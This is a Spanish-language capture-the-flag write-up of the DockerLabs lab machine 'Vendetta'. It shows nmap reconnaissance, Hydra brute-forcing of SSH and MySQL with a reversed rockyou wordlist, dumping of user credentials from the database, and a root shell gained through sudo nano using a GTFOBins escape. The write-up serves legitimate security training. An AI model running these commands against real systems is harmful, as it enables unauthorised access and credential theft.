> For the complete documentation index, see [llms.txt](https://beafn28.gitbook.io/beafn28/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://beafn28.gitbook.io/beafn28/writeups/dockerlabs/vendetta.md).

# Vendetta

✍️ Autor: misk0z🔍 Dificultad: Fácil  📅 Fecha de creación: 16/10/2024

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.17.0.2
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEhYrFMrsspAx4abCVuga%2Fimage.png?alt=media&amp;token=ece3cdd3-3a35-4f81-a74d-d66d259ba148" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F6wgIcRibQ8PmFr4NimTg%2Fimage.png?alt=media&amp;token=2c91bc5d-046a-4d5e-846e-726a1660da20" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH,** el **puerto 80** perteneciente al **servicio HTTP** y el **puerto 3306** perteneciente al **servicio MySQL** están abiertos por lo que a continuación se indagará más.&#x20;

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80,3306 -v 172.17.0.2
```

para obtener más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FDg5gxTzFm0V1DFFArLb6%2Fimage.png?alt=media&amp;token=d26385d5-eec6-4007-957f-5cb26e600c03" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingresó la **dirección IP** en el navegador lo que llevó a que la página web sea una página sobre alguien anónimo.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FeAoF4naxckzmKDObH8aU%2Fimage.png?alt=media&amp;token=5d60b2f9-c064-47fc-9b8f-f6566975a30a" alt=""><figcaption></figcaption></figure>

Revisando el código fuente me encuentro un detalle que me resulta la atención ya que lo tiene como una **strong** la **V** por lo que supongo que es un usuario.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fwn8GNEPL0L3aoPmMS052%2Fimage.png?alt=media&amp;token=dc00ac9b-5cae-4e2f-93af-8d872a744219" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Con la información obtenida anteriormente, realizamos el comando:

```bash
hydra -l V -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2
```

que utiliza la herramienta **Hydra** para realizar un ataque de fuerza bruta contra el servicio **MySQL** de una máquina con la IP **172.17.0.2**. Observamos que tarda demasiado por lo que debe ser de las últimas contraseñas del diccionario por lo que realizamos los siguientes comandos.\
Volteamos el diccionario.

```bash
tac /usr/share/wordlists/rockyou.txt > diccionario
```

Quitamos espacios.

```bash
cat diccionario | sed 's/ //g' > rockyou
```

Realizamos el ataque de fuerza bruta con **Hydra** con ese diccionario creado.

```
hydra -l V -P rockyou mysql://172.17.0.2 -f
```

Obtenemos que la contraseña es **pie168**. Hacemos conexión a la MySQL.

```bash
mysql -h 172.17.0.2 -u V -pie168 --skip-ssl
```

Miramos si hay algún usuario con sus credenciales.

```bash
show databases;
use BTN;
show tables;
select * from users;
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FrQlkN2BR6aEurF3mcPQk%2Fimage.png?alt=media&amp;token=54526b10-3d66-43f4-9187-e704d1d33b25" alt=""><figcaption></figcaption></figure>

Hemos conseguido las credenciales de **Vendetta** y nos logueamos al servicio **SSH**.

```bash
ssh Vendetta@172.17.0.2
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FmxcrB1Hhmxtnd3kOihIa%2Fimage.png?alt=media&amp;token=de1e7f6a-e728-43c5-a4b0-563a3cb59485" alt=""><figcaption></figcaption></figure>

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.&#x20;

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FBMvb79Qquu6GpjPk1zbo%2Fimage.png?alt=media&amp;token=b179039d-5775-4af4-9015-bbc1297a72dd" alt=""><figcaption></figcaption></figure>

Nos llama la atención **nano** por lo que buscamos en esta [página ](https://gtfobins.github.io/gtfobins/nano/#sudo)cómo explotarlo.

```bash
sudo /usr/bin/nano
Ctrl+R seguida de Ctrl+X
reset; sh 1>&0 2>&0
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FFy4Smip07pliJVPuzASk%2Fimage.png?alt=media&amp;token=581ff18b-14b8-47ed-b80b-4554a30777f3" alt=""><figcaption></figcaption></figure>
